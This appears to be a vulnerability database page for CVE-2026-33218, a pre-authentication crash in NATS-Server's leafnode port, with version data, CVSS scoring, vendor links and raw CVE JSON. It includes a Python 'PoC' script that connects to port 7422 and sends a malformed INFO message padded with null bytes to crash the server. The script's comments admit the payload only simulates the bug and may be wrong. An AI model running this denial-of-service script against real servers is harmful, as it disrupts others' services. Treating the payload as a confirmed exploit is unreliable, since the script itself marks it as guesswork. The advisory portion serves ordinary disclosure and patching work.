Security Vulnerability Report
CVE-2026-33218 CVSS 7.5 HIGH

Published: 2026-03-25 20:16:33
Last Modified: 2026-03-26 17:15:02

Description

NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, a client which can connect to the leafnode port can crash the nats-server with a certain malformed message pre-authentication. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, disable leafnode support if not needed or restrict network connections to the leafnode port, if plausible without compromising the service offered.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* - VULNERABLE (NATS-Server < 2.11.15)
cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* - VULNERABLE (NATS-Server < 2.12.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# CVE-2026-33218 PoC Concept for NATS-Server
# Target: NATS-Server < 2.11.15, < 2.12.6
# Description: Connect to leafnode port and send malformed message to trigger crash.


def send_exploit(target_host, target_port):
    try:
        # Establish TCP connection to the leafnode port
        print(f"[*] Connecting to {target_host}:{target_port}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_host, target_port))
        print("[+] Connection established.")

        # Construct a malformed message that violates the NATS protocol
        # This payload simulates an invalid INFO or CONNECT protocol handshake
        # which triggers the parsing vulnerability in the leafnode handler.
        # Note: The exact bytes may vary based on specific protocol parsing logic.
        malformed_payload = b"INFO \"malformed_json_structure\"\r\n" + b"\x00" * 1000 + b"\r\n"
        print("[*] Sending malformed payload...")
        s.send(malformed_payload)

        # Attempt to receive response (Server might crash before responding)
        response = s.recv(1024)
        print(f"[+] Received response: {response}")
    except ConnectionResetError:
        print("[!] Connection reset by peer - possible crash detected.")
    except socket.timeout:
        print("[!] Connection timed out - possible hang detected.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")
    finally:
        s.close()


if __name__ == "__main__":
    TARGET_IP = "127.0.0.1"  # Replace with target IP
    LEAFNODE_PORT = 7422  # Default leafnode port
    send_exploit(TARGET_IP, LEAFNODE_PORT)
```

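References

https://advisories.nats.io/CVE/secnote-2026-10.txt (Mitigation, Vendor Advisory)
https://github.com/nats-io/nats-server/security/advisories/GHSA-vprv-35vv-q339 (Mitigation, Vendor Advisory)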

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33218",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-25T20:16:32.623",
    "lastModified": "2026-03-26T17:15:02.390",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, a client which can connect to the leafnode port can crash the nats-server with a certain malformed message pre-authentication. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, disable leafnode support if not needed or restrict network connections to the leafnode port, if plausible without compromising the service offered."
      },
      {
        "lang": "es",
        "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del borde. Antes de las versiones 2.11.15 y 2.12.6, un cliente que puede conectarse al puerto leafnode puede bloquear el nats-server con un mensaje malformado específico pre-autenticación. Las versiones 2.11.15 y 2.12.6 contienen una corrección. Como solución alternativa, deshabilite el soporte de leafnode si no es necesario o restrinja las conexiones de red al puerto leafnode, si es factible sin comprometer el servicio ofrecido."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-20"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.11.15",
                "matchCriteriaId": "13EA156E-2759-4586-A22E-CDEAAD4D610C"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.12.0",
                "versionEndExcluding": "2.12.6",
                "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://advisories.nats.io/CVE/secnote-2026-10.txt",
        "source": "[email protected]",
        "tags": ["Mitigation", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-vprv-35vv-q339",
        "source": "[email protected]",
        "tags": ["Mitigation", "Vendor Advisory"]
      }
    ]
  }
}
```